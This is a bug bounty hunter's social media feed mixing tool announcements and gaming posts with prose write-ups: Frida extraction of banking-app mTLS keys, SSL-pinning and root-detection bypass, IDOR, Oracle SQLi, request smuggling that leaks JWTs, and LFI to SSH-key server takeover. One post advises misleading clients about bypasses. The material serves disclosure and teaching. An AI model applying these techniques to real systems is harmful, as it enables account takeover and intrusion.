Interested in Application Security, Bug Bounty, Reverse Engineering, Frida & Ghidra @NoBugEscapes @BugBountyZip bugbounty.zip

Michigan
Blind Insecure Direct Object Reference (IDOR) On Instagram. Write-up: nobugescapes.com/blog/blind-… #bugbountytips #bugbounty #p2 #bugcrowd #meta
16
85
399
Replying to @Naughty_Dog
The 15th anniversary of Uncharted 2 is coming up on October 13, 2024! Any chance we'll see a multiplayer experience on PS4 or PS5? #Uncharted2 #Anniversary
2
723
2,710
Replying to @Naughty_Dog
And As part of this anniversary celebration, we are excited to bring back Uncharted 2 Multiplayer on PS5.
7
4
709
12,032
Replying to @Naughty_Dog
Uncharted 2 Multiplayer on ps5&ps4. #uncharted2 #ps3
1
1
708
3,620
1/ 🎉 Exciting news! Introducing BugBounty.zip! A potent toolkit designed specifically for bug bounty hunters. Hosted directly on GitHub, it's accessible anytime, anywhere! 🌍🛠 (1/6)
22
234
711
121,919
I've just developed my first @Burp_Suite Bambdas specifically to identify OWASP Top-25 Parameters potentially vulnerable to XSS, SSRF, RCE, SQLi, LFI, and Open Redirect. For easy code access, visit GitHub: github.com/BugBountyzip/Bamb… #Bambdas #Java
8
170
664
91,112
Bambda @Burp_Suite script searches through Burp history for JavaScript files, extracts hidden endpoints, and outputs the discovered endpoints to a text file. The script supports three different regex modes for discovery: High, Deep, and Custom, allowing you to add your own regex. Additionally, you can highlight high-value words (e.g., debug, admin) in red within Burp history if found inside any JavaScript file. The script automatically removes duplicate results. Access the code here: github.com/BugBountyzip/Bamb… #bugbountytips #BugBounty #burpsuite #bambda #bambdas
10
95
471
39,821
Finally, with @hw16, we managed to bypass the @Cloudflare mTLS protection after around 5 days of work. I'd like to share a few golden tips for bug bounty hunters who might face something similar in the future. But first, here's a quick summary: The target was a banking app with multiple security layers: • Heavy Frida detection mechanisms • Strong root detection • Google SafetyNet/Play Integrity checks • Runtime hooking detection • APK tampering protection (crashed immediately if repackaged/modified) At first, @fridadotre was detected and crashed the app on my device but strangely worked on another device even though both had the same Android version, root method, Frida server version, and architecture. After investigation, we discovered the app had anti-hooking detection that triggered when using aggressive Frida hooks on sensitive KeyStore operations. The Solution: We wrote a minimal Frida script that: 1. Passively monitored certificate operations without modifying behavior 2. Intercepted KeyManagerFactory.init() - the exact moment when mTLS certificates are loaded 3. Extracted the X.509 client certificate and RSA private key (4096-bit) 4. Encoded them using Android's Base64 encoder 5. Formatted as PEM files ready for use Found the mTLS certificate with a unique UUID-based alias in the Android KeyStore. The certificate was being dynamically loaded during the SSL handshake initialization Extracted Files: • client_cert.pem → Client certificate (valid for 2 years) • client_key.pem → RSA private key (PKCS#8 format) We then created a PKCS#12 bundle using OpenSSL to combine the certificate and key into a single file, which could be imported into various tools and browsers for testing or @Burp_Suite Key Takeaway: When facing anti-tampering mechanisms, be surgical hook only what you need, when you need it. Aggressive hooking triggers detection; passive monitoring flies under the radar. This was an awesome challenge and my first time encountering such strong ssl Pinning defenses Attached some image from the mobile api and frida output the certificates #bugbountytips #frida #Magisk #mtls
Did @Cloudflare just defeat @Burp_Suite and @CaidoIO? Cloudflare protection is becoming very common. This is the third app I’ve seen using it. Changing the user agent doesn’t help, and Burp TLS-fingerprint bypass plugin didn’t work. The app blocks any request when it detects traffic interception My target mobile app might be using a dynamic certificate based on my friend analysis. Back in Nov 2024, I tested a web app with Burp, but it blocked all traffic. Switching to Caido worked, maybe its signatures weren’t detected at the time. Can anyone share insights? thanks #BugBounty
34
177
888
118,567
Someone has stolen my Instagram Username and sold it. I think they social-engineered the Meta support team to gain access, and I never got any email alerts about it. cc : @instagram @mosseri #instagram #Meta
14
71
13,495
With all these achievements, how is Uncharted 2 Multiplayer still missing on PS5? 1. VGX Award for Game of the Year (2009) 2. VGX Award for Best PS3 Game (2009) 3. BAFTA Games Award for Audio Achievement (2010) 4. Writers Guild of America Award for Achievement in Writing (2010) 5. VGX Award for Best Graphics (2009) 6. BAFTA Games Award for Story (2010) 7. BAFTA Games Award for Action Game (2010) 8. BAFTA Games Award for Original Score (2010) 9. IGN Select Award for Best Console Game (2009) 10. IGN Select Award for Best Game (2009) 11. IGN Select Award for Best Visual Design (2009)
1
312
3,807
Replying to @elonmusk
AI = Absolutely Impressive moves!
259
13,885
Just added a new feature to @Burp_Suite now you can hide your screen with a privacy overlay! Easily enable or disable it by pressing F12. github.com/BugBountyzip/Bamb… #BurpSuite #BugBounty #Bambads #Privacy
7
8
220
21,069
Replying to @realradec
One of the greatest games ever made this masterpiece deserves a multiplayer revival on PlayStation 5! @PlayStation @Naughty_Dog #uncharted2
180
1,510
Just launched: My first @CaidoIO plugin! Here's what it offers: Quick access to your go-to payloads and wordlists Easy management of your custom word collections Option to create personalized buttons for specific tasks #Bugbounty
14
25
202
25,481
Did @Cloudflare just defeat @Burp_Suite and @CaidoIO? Cloudflare protection is becoming very common. This is the third app I’ve seen using it. Changing the user agent doesn’t help, and Burp TLS-fingerprint bypass plugin didn’t work. The app blocks any request when it detects traffic interception My target mobile app might be using a dynamic certificate based on my friend analysis. Back in Nov 2024, I tested a web app with Burp, but it blocked all traffic. Switching to Caido worked, maybe its signatures weren’t detected at the time. Can anyone share insights? thanks #BugBounty
15
16
238
119,873
Just extended Burp Suite beyond its traditional use by making it capable of disassembling and analyzing PlayStation 3 games ELF files with my first Bambad script, targeting the PowerISA-Altivec-64-32addr architecture! This could make Burp Suite more powerful for looking inside binaries, not just network traffic! #bugbounty #BurpSuite #PS3 #Bambdas
8
14
191
16,175
Replying to @realradec
Nathan Drake & Alex Mercer
2
117
5,385
I developed a Memory Scanner and Disassembler GUI tool for Playstation 3 using the Target Manager API. I used @iMoD1998 PS3 API for TMAPI in Python and made a GUI tool. Features include memory read/write, disassembly, and patching. Written in Python, with more features to come. I was inspired by the Cheat Engine tool for game hacking and reverse engineering and wanted to create something similar. Although Net Cheat for PS3 exists, I found it unreliable due to frequent crashes. PS3 API for TMAPI and CCAPI in python by iMod1998 github.com/iMoD1998/PS3API #PS3 #GameDev #Modding #TMAPI #ghidra #PowerPC
1
4
121
1,649
Looking for a bug bounty hunter for a penetration testing role. Your college degree doesn’t matter just share your bug bounty profile, research blogs, and any relevant work. DM if you're interested!
24
9
145
25,471
Soon, I'll be introducing a new tool on BugBounty.zip: a new vulnerability scanner based on OWASP's top 25 vulnerable parameters. It's fast, user-friendly interface, and effortless usability. I'm confident you'll love it! Stay tuned for updates. : D #BugBounty
3
25
134
16,407
Hello @Burp_Suite If you can correct the Arabic language in responses, it's been nearly a year.
4
1
43
6,802
New in @Burp_Suite Screen Drawing! A lifesaver when triage asks for more details after you’ve walked them through the bug multiple times #bugbounty #burpsuite #bambdas github.com/BugBountyzip/Bamb…
2
16
136
10,362
You can now use @CaidoIO with PlayStation 5 DualSense controller wirelessly! Mapped few shortcuts using DS4Windows + Caido Shortcuts 🎮 X = Forward request O = Drop request Square = Go To Replay tab The theme used on the video is custom theme inspired from PS4 #bugbounty
4
2
90
4,531
No borders for bug bounty hunters – use your jailbroken PlayStation 4 to run @CaidoIO, demonstrated on Linux Fedora 38. You can also switch back to the original PS4 OS or Linux anytime. #BugBounty #bugbountytips #PS4 #x86
1
11
102
4,680
If Burp Suite finds the bugs, Bambdas make them history! You can write Java-based Bambdas to create custom filters for your HTTP history. Explore a variety of Bambda scripts, some written by me and others shared by our community, at marketplace.bugbounty.zip/Bu… You can browse the scripts using arrow keys and quickly copy any Bambda script to your clipboard with a press of 'C'. Compatible with both Burp Suite Community Edition and Professional. We're currently optimized for desktop browsers and are working on an Electron-based desktop app for a more integrated experience. 🔧 Got a bug to report or an idea to share? Please let us know on GitHub: github.com/BugBountyzip/bugb… #bugbounty #Bambdas
1
32
120
24,239
Rapid-Hand! 💥 Inject a list of payloads into different parameters all at once, then export the output, encode/decode, and even open them all in a new tab. Supercharge your testing process and improve efficiency. bugbounty.zip/RapidHand.html
4
42
117
11,883
Replying to @NaughtyDogJobs
You don't need a writer you can use @ChatGPTapp
3
64
3,887
@Burp_Suite Bambda Script, leveraging ChatGPT for accurate API endpoint prediction. Find the code on GitHub: github.com/BugBountyzip/Bamb… Supported by both Burp Suite Community and Pro editions #Bambdas #bugbounty
26
103
12,376
Replying to @Burp_Suite
68
1,145
The PS3 had a special type of processor called the Cell processor, which is quite different from the x86 processor used in the PS5. This difference makes it difficult to directly emulate PS3 games on the PS5, as it requires a lot of processing power and complicated software. #ps3 #ps5
It's been 1363 days since the PS5 launched, and it still can't emulate PS3 games.
1
1
75
2,086
I’ve added glitch effects to @Burp_Suite Check out the code at github.com/BugBountyzip/Bamb… Toggle the effects on or off by pressing F12. #bugbounty #burpsuite #Bambdas
1
72
1,575
This is a good thread from the community about Flutter SSL pinning bypass. They have explained most of the common ways to bypass SSL pinning in Flutter apps. I want to share some points from my own experience with Flutter apps The tool mentioned in the thread, Refluutr, will not work in most cases. If it works for you, you are lucky. Sometimes the APK will refuse to run and crash right away because it was modified and signed with a different certificate. The developer or the SDK protection might have integrity checks to see if the app has been modified before For Frida, there are scripts made by the community to bypass SSL pinning in Flutter apps The problem is that many apps can detect Frida and will close immediately You will need to patch the Frida server to avoid detection Another useful program I have used before is ProxyDroid, but it needs root access. #bugbountytips
anyone has good advise on how to intercept flutter based mobile apps with burpsuite?
3
10
97
9,514
Coming soon: @CaidoIO CaidVo PassCode! After 3 wrong attempts, Caido may lock permanently until uninstalled. Backed with memory encryption and anti-debugging. I locked mine and now have to figure out how to remove the plugin! 😝 #BugBounty #DenuVo
1
67
1,560
🫡 @CaidoIO Crawler🕷️ + Scanner in progress #BugBounty #bugbountytips #JavaScript links.caido.io/www-discord
8
13
94
6,526
It’s 1999 again, and your Burp Suite UI is stuck in time. Pixelated, slow, and full of nostalgia from the early days of the internet. @Burp_Suite version 1999.9.9 Bambda theme #Burpsuite #bugbounty #bambdas
1
3
74
2,766
Thank you Meta Security Team For th bounty @fbsecurity @Meta @instagram @Bugcrowd More details will be shared Soon on my personal blog NoBugEscapes.com
7
1
88
Just created a @Burp_Suite fade in/out effect! Works in both Community & Professional editions. Stop the effect by pressing F12. To run the script, switch to Bambda mode, paste the code, and click "Apply and Close." Script here: github.com/BugBountyzip/Bamb… #BugBounty #BurpSuite #bambdas
3
62
1,195
Hope🪽 is tool designed to scan a list of URLs and identify potential vulnerable parameters, focusing on OWASP's top 25 vulnerable parameters. Link : bugbounty.zip/Hope.html Discover how it works.👇
1
26
84
16,241
I've added a new feature in @Burp_Suite using a Bambda script that shows link previews when you hover over any links. #burpsuite #bambdas #BugBounty
1
1
58
1,195
Replying to @briscoepark
These remind me of Red Dead Redemption 2 ❤️
77
3,501
New @Cloudflare beta feature detects BOLA attacks via parameter pollution (duplicate params) and enumeration (excessive ID requests). Only adds warning labels, doesn't block attacks. enumeration detection needs 10k+ user sessions to learn normal behavior first. New endpoints have zero detection until enough traffic. developers.cloudflare.com/ap… #bugbounty #ApplicationSecurity #WAF
2
15
74
6,466
These images were generated with Grok AI! #AIArt #Grok
42
962
Any chance we’ll see a CSRF Generator in @CaidoIO soon? Definitely a feature worth waiting for! 💔😮‍💨 #BugBounty
4
4
61
8,439
Mutual TLS (mTLS) Collaboration with @hw16 on this task is ongoing. Anti-hooking and anti-fraud SDKs have slowed us down, but we’ve made significant progress and gotten some secrets cloudflare.com/en-gb/learnin… By @Cloudflare #BugBounty #frida #Magisk
Did @Cloudflare just defeat @Burp_Suite and @CaidoIO? Cloudflare protection is becoming very common. This is the third app I’ve seen using it. Changing the user agent doesn’t help, and Burp TLS-fingerprint bypass plugin didn’t work. The app blocks any request when it detects traffic interception My target mobile app might be using a dynamic certificate based on my friend analysis. Back in Nov 2024, I tested a web app with Burp, but it blocked all traffic. Switching to Caido worked, maybe its signatures weren’t detected at the time. Can anyone share insights? thanks #BugBounty
3
5
57
5,342
Grateful to @Cloudflare 🌩️ for their outstanding bug bounty program! hackerone.com/cloudflare :) #bugbounty #hackerone
2
5
53
5,566
Replying to @HRHMBNSALMAAN
A leader who pushes for progress and innovation.
41
715
I’ve built a password lock screen plugin for @CaidoIO. Can you break it? DM your proof and earn a 1-month Pro Caido subscription! Project link : github.com/BugBountyzip/Caid… #bugbounty #ReverseEngineering #Debugger
3
12
42
10,295
CVE-2022-35646 ibm.com/support/pages/node/6… I will share technical details soon on how to reject users' requests before they reach the line manager. nobugescapes.com
6
4
41
9,788
Session-Based Validation Bypass via Trusted Parameter Override #bugbountytips
Session-Based Validation Bypass via Trusted Parameter Override 🔴GET /v1/user/profile/userDetails → Pulls my data based on my JWT session token. 🔴GET /v1/user/profile/userDetails?userId=victim-id → The app ignores the session and trusts the userId param which leads to exposing victim’s data The logic prioritizes userId from the request over the authenticated session, leading to session confusion and broken access control. #bugbountytips #websecurity
1
35
1,405
Replying to @realradec
Life with PlayStation: Discontinued in 2012. PlayStation Home: Shut down on March 31, 2015. We hope the PlayStation 3 lasts forever. #PlayStation #ps3
3
34
2,678
Replying to @realradec
The light that launched a thousand repair kits
26
677
You can now create different PoCs for Cross-Site Request Forgery (CSRF) attacks. I'm pleased to make this available to all! #BugBounty #bugbountytips
🛡️✨ Another addition to the Caido Store! Introducing "CSRF PoC Generator" by @Tur24Tur. Generate various types of CSRF PoC payloads from requests. Check it out: github.com/BugBountyzip/Caid…
3
7
33
2,728
Replying to @haxor31337
Bug bounty platforms should be responsible for adding a warning message when researchers submit a report. The message could say: "Please note that this program also has a paid private program. Email us to request an invite."
1
22
840
Hello Pentesters and Bug Bounty Hunters, Please avoid reporting issues like "Jailbreak/root detection bypass" to app owners or during pentesting engagement. These problems are related to the security SDK providers, not the app developers. If you report them, you are giving free help to the SDK company. If you are asked about it, you can simply say: "The current app version is secure. The issue happens only on older versions." Thank you for your understanding #bugbountytips #BugBounty
2
31
4,063
New update for the Caido CSRF plugin! Release 1.0.4: Added HTML encoding for parameter values with double quotes. Big thanks to @stealthcopter for the contribution! #bugbounty #bugbountytips
🛡️✨ Another addition to the Caido Store! Introducing "CSRF PoC Generator" by @Tur24Tur. Generate various types of CSRF PoC payloads from requests. Check it out: github.com/BugBountyzip/Caid…
1
6
30
4,456
Replying to @h4x0r_dz
Find vulnerabilities! get a certificate! (Printing costs not covered)
22
568
The app has a new look with an updated design there's is also a new javaScript scanner just add your javaScript files and it will automatically find all the endpoints more features and ideas will be added over time. bugbounty.zip/index.html# #bugbountytip #BugBounty
Complete UI redesign with modern dark/light theme support and smooth animations. #BugBounty bugbounty.zip/Patch.html
1
1
29
1,654
Request Smuggling Exposes JWT Enables 0-Click Account takeover #BugBounty #bugbountytips
كيف ثغرة سمحت لنا ندخل حساب أي شخص؟ كيف قدرنا انا و @0x_itto نكتشف ثغرة 🔴Request Smuggling Exposes JWT — Enables 0-Click ATO!! والي سمحت لنا نتحكم بحساب أي شخص بشكل كامل بدون أي تفاعل من المستخدم! مسيتم بالخير جميعاً اليوم بنتكلم عن احد الثغرات الممتعة والغريبة اللي اكتشفناها أثناء فحصنا لأحد المواقع. من خلال استغلالنا لهالثغرة، قدرنا نوصل لحساب أي شخص بدون اي تفاعل من الشخص! ونسمي بالله ونبدا نفصّل لكم القصة كاملة # Request Smuggling? بالبداية وش يعني Request Smuggling؟ قبل لا ندخل بالتفاصيل، لازم نوضح وش يعني Request Smuggling؟ وكيف تصير؟ الحين كلنا نعرف إن الريكوست الواحد يمر على أكثر من عملية زي - CDN - Load Balancer - Reverse Proxy وهذي عبارة عن Front-End Servers وهم باختصار السيرفرات اللي تستقبل الريكوست أول، قبل لا توصله للسيرفر الرئيسي (Back-End Server) هالشي بحد ذاته طبيعي وممتاز وله فوائد من ناحية البنية والتطوير. لكن المشكلة تبدأ لما الـ Front-End و الـ Back-End يفهمون/يعالجون الريكوست بطرق مختلفة بمعنى الـ Front-End يقرأه بطريقة، والـ Back-End يفسره بطريقة ثانية. وهنا تصير الكارثة! ليش؟ لأن فيه سوء تفاهم بينهم، وهنا بالضبط تصير الثغرة وهذا الي نبغاه كـ bug hunters (; فبكل اختصار، ثغرة Request Smuggling تصير بسبب نقطة وحدة عدم التوافق بين الـ Front-end Servers (CDN, Proxy, Load Balancer) وبين الـ Back-end Server # Discovey في اثناء فحصنا لأحد المواقع بعد بحث قدرنا نكتشف شيء غريب نوعا ما والي هو.. لما نرسل request ونتلاعب بالـ Content-Length و Transfer-Encoding headers ولاحظنا شيء مو طبيعي والي هو يكون فيه تأخير بالرد والتأخير ماكان طبيعي مثل مانشوف بالصورة الريسبونس صار يتأخر، ويعطينا Timeout، مثل ما تشوفون بالصورة. وهالشي يوضح إن فيه اختلاف بالتعامل مع الريكوست: والواضح ان الـ Front-end كان يستخدم Content-Length والـ Back-end يستخدم Transfer-Encoding ولو ما تعرف وش وظيفة هالهيدرز (Headers) ببساطة هي اللي تعرف نهاية الـ Request Body او نهاية الطلب المرسل فبما إن كل سيرفر يتعامل معه بطريقة مختلفة، صار فيه تعارض/confusion والنتيجة؟ ثغرة Request Smuggling و النوع هنا (CL.TE) يعني الـ Front-end يعتمد على Content-Length والـ Back-end يعتمد على Transfer-Encoding فبسبب عدم التوافق هنا بين السيرفرين للهيدزر نتج لنا الاتي وبكذا تأكدنا انه فعلا كان فيه request smuling وخلصنا أول واهم خطوة والان نتقل للجزء الأصعب والي هو الأستغلال # Exploiting the smuggle to smuggle (; الان ننتقل الى الجزء الأصعب والي هي هو الأستغلال زي ما نعرف، استغلال الـ Request Smuggling يختلف من موقع لموقع، ومو دايم يكون له أثر قوي، بس حنا ما وقفنا. جربنا عدة سيناريوهات، وللأمانة النتائج بالبداية كانت ضعيفة. لكن بعد بحث وتجارب كثيرة، لقينا شيء… بس مب أي شيء الموقع كان فيه function تسمح للمستخدمين يعلّقون على أي منشور فجتنا فكرة... وش يصير لو حاولنا نستغل الـ request smuggling على post-comment function؟ (تعليق المنشور) وجربنا نسوي له smuggle باستخدام نفس الـ CL.TE technique. والصورة توضح كيف صار الاستغلال... مثل ما تشوفون، استغلينا request smuggling على post-comment، والـ backend استقبل الريكوست كأنه ريكوستين مفصولين. الصفر 0 يمثل نهاية الـ request على حسب chunked format اللي يفهمه الـ backend. فصار ريكوست post-comment معلّق في الـ backend، وأي ريكوست يجي بعده راح يعتبره تكملة للـ request الأول، وبكذا يدمجهم كلهم كأنه ريكوست واحد. وش الضرر ياعمر؟ الـ request حق الضحية (اللي جا بعدنا) يطلع داخل الكومنت ، بما فيه الـ Authorization header واللي يحتوي على الـ JWT token 🤯 يعني باختصار: 0-click Account Takeover (ATO) وعشان نتأكد؟ نشوف الصورة هذي باستغلالنا للـ request smuggling، قدرنا نـ smuggle أي ريكوست ينرسل بعدنا، وبكذا نقدر نشوف الـ JWT token حق أي مستخدم يزور الموقع بعدنا بدون ما يسوي شيء! ومن خلال ال JWT token نقدر ندخل حساب المستخدم بشكل كامل من دون أي تفاعل منه! والي هنا وصلنا لختام المقالة اتمنى المقالة نالت على اعجابكم! وانتظرونا للمقالة الجاية 🔥
1
26
1,615
Thanks @Bugcrowd for the challenge coins. #BugBounty #bugcrowd #P1
6
1
27
I've maintained the #1 rank on the official repository since the launch of @Burp_Suite Bamabd, with my first pull request submitted on December 4, 2023. Take a look at some scripts I’ve created github.com/PortSwigger/bambd… #bugbounty #Bambdas #Burpsuite
Did you know, with the new Bambda Library, you can save your favorite Bambdas? 💾 #BurpTopTip #BambdaLibrary #extensibility
24
2,096
My target mobile app had VPN detection, which I bypassed. Then I used @HttpToolkit, which acts like a VPN, but all traffic was still blocked
2
1
26
4,428
First, attempt to exploit the vulnerability manually, beginning with a UNION-based attack. Since this is an Oracle database, remember to specify a table in your SELECT statement. For a quick proof of concept, you can use the built-in table called "dual."
1
22
287
My first plugin is live on @CaidoIO store! Great tool for anyone who wants to draw on their screenshots. Shows how powerful Caido plugins can be! #bugbounty #bugbountytips
🖍️✨ Another addition to the Caido Store! Introducing "Screen Drawing" by @Tur24Tur. Transform your cursor into a drawing pen and easily annotate Caido to improve your screenshots for reports. Check it out: github.com/BugBountyzip/Caid…
2
9
22
1,700
You can now add your TV to your red teaming tool kit for the next engagement. Access @CaidoIO proxy history through its GraphQL APIs on your TV. Resources Caido GraphQL: docs.caido.io/concepts/inter… Internal Network Access: docs.caido.io/reference/conf… #bugbounty #Sony #bravia
4
4
22
1,981
1k ♥️ A huge thanks to all of you Looking forward to sharing more thoughts, ideas, and conversations with this amazing community. #bugbounty
1
21
3,858
Replying to @CaidoIO
I’ve worked on several plugins, some completed and some still in development. How can I go about sharing them on the store? I have ported some plugins from bugbounty.zip
1
2
19
1,681
Evidence • Screen Recorder Don't let a single bug escape unnoticed, Evidence is your reliable ally, capturing bugs as they happen. bugbounty.zip/Evidence.html #BugBounty #bugbountytips #BugBountyzip
4
21
4,522
Next, I’ll be testing these @fridadotre scripts on other apps that might use similar technologies and sharing them on the Frida community page. I want to confirm that my solution works across different apps, not just my target. Honestly, I hope I don’t encounter this type of defense again. Ideally, proxy tools like @Burp_Suite , @CaidoIO should automate the process or provide a built-in solution so that bug bounty hunters can spend more time testing the target itself rather than fighting with the setup. It would also be great if the community could come up with a similar solution that doesn’t rely on Frida but still allows us to extract the certificates effectively
2
2
27
4,864
I've also developed a similar tool in JavaScript, available at Bug Bounty Zip. You can use it at: bugbounty.zip/Hope.html #BugBounty References: OWASP TOP 25 Parameters owasp.org/www-project-top-25… Bambdas - the next big thing in customization portswigger.net/burp/pro/fea…
3
19
3,821
Duplicate
2
20
1,506
I used to support @deepseek_ai, but not anymore. They lack the resources to handle a large user base, and every request is met with "Server is busy." I’ll give them two weeks to improve if nothing changes, I’ll either resubscribe to @ChatGPTapp or subscribe to @AnthropicAI so I have two Sonnet 3.5 accounts. #Ai #DeepSeek #ChatGPT
2
1
17
3,100
QuickSSRF
🚀 New plugin in the Caido Store! Introducing "QuickSSRF" by w2xim3. Perform out-of-band testing with interactsh to detect vulnerabilities like blind SSRF. Check it out: github.com/caido-community/q…
1
1
17
1,126
If the domain is within the defined scope, the bug should be accepted. If it’s a test environment, it should be hosted on the internal development network rather than being publicly accessible.
16
1,833
Seeing alphanumeric OTPs on @instagram now. Did @Meta make the switch after a reported but undisclosed account takeover vulnerability. "TDCXGHDTJ is your Instagram code. Don't share it. SSDRxcfdryn" #AppSec #InfoSec
2
18
2,292
Replying to @realradec
They should invest that money in developing and reviving the online multiplayer for classic PS3 games like Uncharted 2, Uncharted 3, and others, and bring them to the PS5. I believe that long-time players miss those days, and new players are excited to experience the nostalgic moments they never had the chance to enjoy.
1
15
4,099
Scenario to consider If a bug bounty program has this feature enabled and you find an IDOR vulnerability, you might face this situation: You report it within 10 minutes of discovery, but @Cloudflare BOLA detection already alerted their team. They investigate and patch it immediately. When triage tries to reproduce your bug the next day, it's already fixed and your report gets marked as "Not Applicable" despite finding a valid vulnerability. document everything video recordings, screenshots, request/response captures. Without proof, your valid finding becomes "not reproducible.
1
18
950
Replying to @cs @Meta @instagram
Hey Adam Mosseri @mosseri Please look into this case. How can someone's username be swapped to another person? Review the support tickets and examine how this request was handled. This requires your investigation.
17
9
3,825
I spent a few days reverse engineering one of the android shield solutions that provides root detection i also analyzed it dynamically using @fridadotre 🔥. Most of the detection logic was encrypted and only decrypted at runtime when the app starts here are some common detection methods i found I have organized them with the help of ai for better clarity ## Root Detection Checks - /data/local/su - /data/local/bin/su - /data/local/xbin/su - /sbin/su - /su/bin/su - /system/bin/su - /system/bin/.ext/su - /system/bin/failsafe/su - /system/sd/xbin/su - /system/usr/we-need-root/su - /system/xbin/su - /cache/su - /data/su - /dev/su - /xbin/su ## Busybox Detection Checks Checks for busybox in: - /data/local/busybox - /data/local/bin/busybox - /data/local/xbin/busybox - /sbin/busybox - /su/bin/busybox - /system/bin/busybox - /system/bin/.ext/busybox - /system/bin/failsafe/busybox - /system/sd/xbin/busybox - /system/usr/we-need-root/busybox - /system/xbin/busybox - /cache/busybox - /data/busybox - /dev/busybox - /xbin/busybox ## Magisk Detection Checks Checks for magisk in: - /data/local/magisk - /data/local/bin/magisk - /data/local/xbin/magisk - /sbin/magisk - /su/bin/magisk - /system/bin/magisk - /system/bin/.ext/magisk - /system/bin/failsafe/magisk - /system/sd/xbin/magisk - /system/usr/we-need-root/magisk - /system/xbin/magisk - /cache/magisk - /data/magisk - /dev/magisk - /xbin/magisk - /metadata/magisk/zygisk_lsposed ## Emulator Checks - /mnt/windows/BstSharedFolder - Reads CPU information from /proc/cpuinfo - Reads CPU frequency from all CPU cores: - /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq - /sys/devices/system/cpu/cpu1/cpufreq/scaling_cur_freq - (etc. for all 8 CPU cores) - Checks system properties like ro.boot.debug_level and ro.build.characteristics ## Xposed/Modification Checks - /system/framework/XposedBridge.jar - Reads process memory maps from /proc/9296/maps ## System Commands Executes: - getprop - to get system properties - mount - to check mount points
Hello Pentesters and Bug Bounty Hunters, Please avoid reporting issues like "Jailbreak/root detection bypass" to app owners or during pentesting engagement. These problems are related to the security SDK providers, not the app developers. If you report them, you are giving free help to the SDK company. If you are asked about it, you can simply say: "The current app version is secure. The issue happens only on older versions." Thank you for your understanding #bugbountytips #BugBounty
3
17
2,033
Replying to @xMBGx
Resistance: Fall of Man @insomniacgames
14
708
Choose your own font for @CaidoIO from the selection, or upload a font of your choice,The plugin also offers effects for characters, such as shaking. #bugbounty #bugbountytips
🆕🖋️ New plugin in the Caido Store! Introducing “Font Selector” by @Tur24Tur. Customize Caido’s interface with a range of fonts and text effects, including options for custom font uploads and subtle animations. Check it out: github.com/BugBountyzip/Caid…
2
4
16
1,070
Replying to @h4x0r_dz
Linux users can't verify if they're robots.
1
12
955
Banking apps may detect Developer mode on Android, but you can bypass it using Lposed's IAMNotADeveloper 🚫 module. Check it out here: 🔗 github.com/Xposed-Modules-Re… #bugbountytips #bugbounty
1
16
1,793
Replying to @Bugcrowd
I received an email saying that my password was reset for security reasons. I'm concerned there might be a breach or an info stealer on my machine. 🤣 I even reviewed the event logs and didn’t find any signs of unauthorized access to my account
1
11
2,245
Someone shared a method to bypass @instagram two-factor authentication by contacting the support team. The process involves using the contact form on the mobile app when attempting to log in. Upon reaching out, an employee might provide you with an 8-digit backup code to regain access. For anyone at Facebook who would like to investigate, my username was tjr , The guy who stole it is @_TJRTrades
Someone has stolen my Instagram Username and sold it. I think they social-engineered the Meta support team to gain access, and I never got any email alerts about it. cc : @instagram @mosseri #instagram #Meta
5
12
2,963
Replying to @dPhoeniixx
i feel like you were begging a company to get a CVE and they ignored you then you felt oppressed by someone else's work Just shut up and mind your own business
13
662
A Local File Inclusion vulnerability in an Angular website allowed an SSH private key to be obtained, leading to server control #BugBounty #bugbountytips
🔴كيف قدرت اتحكم بسيرفر لأحد الجهات الحساسة بشكل كامل واكتشف اكثر من 15 ثغرة حرجة. a Single LFI to +15 Critical Bugs A Web-Boundary Pivoting Story مسيتم بالخير, رجعا لكم بمقالة جديد بعد انقطاع, لكن على ماقال من طول الغيبات جاب الغنايم اليوم باذن الله بتكلم عن طريقة اكتشافي لثغرة من خلاله اكتشفت +15 ثغرة حرجة اخرى في احد الجهات الحساسة. # البداية أثناء الفحص لاحظت إن الموقع مبني بـ Angular، وهذا يعني إن ملفات الـ JS راح تكون كنز لفهم طبيعة الموقع. أول يوم فحص ما حصلت نتيجة مباشرة، لكن طلعت بأهم شيء والي هو صرت فاهم التارقت أكثر. بالتكملة, بما إن فيه عدة Roles بالموقع، وكمستخدم عادي ما كان عندي إلا كم Functions ظاهر لي كمستخدم عادي، قررت أركز تحليلي بالكامل على ملفات الـ JS. وهنا جاء وقت اتكلم عن ال runtime.js، والي هو عبارة عن ملف JavaScript موجود بالمواقع اللي تستخدم Frameworks مثل Angular. وفكرته بكل اختصار إنه يعرف ملفات JS الأخرى ويستعملها وقت الحاجة، ويطلق على هذي الملفات بال chunks وهذي كلها عباره عن JS files بنيت سكربت يسوي Load للـ JS files المعرفة بالـ runtime، بشكل مباشر وقدرت أجمع أكثر من 35 ملف وبدأت أحللهم واحد واحد. ومالكم بالطويلة, في أحد الملفات لقيت Function معرفة preview-attachment، وظيفتها عرض المرفقات أو الصور من خلال تحليلي الى الـ JS لاحظت إنها تستعمل معرفين في Functions مختلفة لعرض الصور: - filePath - fileName في بعض الـ Functions الأخرى بالموقع كان يتم استخدام fileName فقط، لكنه مقيّد بمسار معين ومعه Validation على ال Input ويعرض الصور من مسار ثابت مباشرة من الـ server-side. وش تبي وصله ياعمر؟ يعني فكرة انه اوصل الى ملفات اخرى غير الصور فكرة غير ممكنة بأستعمال ال fileName parameter لكن ماذا عن ال filePath؟ إذا أضفته في نفس الـ Request، راح يسوي overwrite على قيمة ال fileName، لأن الـ server-side يفضل filePath على fileName. ونقطة مهمة ما أقدر أحذف fileName لأنه Mandatory Parameter لازم يكون موجود بالـ Request. وفي ال filePath Parameter كنت قادر اني احدد المسار الي يسوي له preview او عرض للصورة. لكن السؤال هل المسار مقتصر على عرض الصور فقط ؟ الجواب لا (; مثل مانلاحظ بالطريقة هذي قدرت اسوي read /etc%0a/%0apasswd مافيه impact ؟ بس هنا وصلنا لل ssh private key الأغلب ممكن يوقف هنا ويرفع تقريره لكن دامك بق هنتر بتحاول تصنع ثغره من اي شيء واحيانا مايضر انك تستكشف شوي (; # Accessing Private SSH Keys to RCE بعد ماجبت ال SSH keys سويت connect على نفس IP السيرفر الي شغال عليه الموقع وقدرت اني اوصل الى السيرفر بشكل كامل الأغلب هنا بيرفع التقرير ويوقف, بس عمرك سمعت عن ال مصطلح ال pivoting؟ لا ماقصد ال pivoting بنطاق ال network بل pivoting بنطاق ال web applications, بعد وصولي للسيرفر اول خطوة سويته اني اشوف ال source code واكتشفت بعض الثغرات من خلال تحليلي الى ال source code ومن ضمنه Account take over على اي حساب مسجل بالجهة 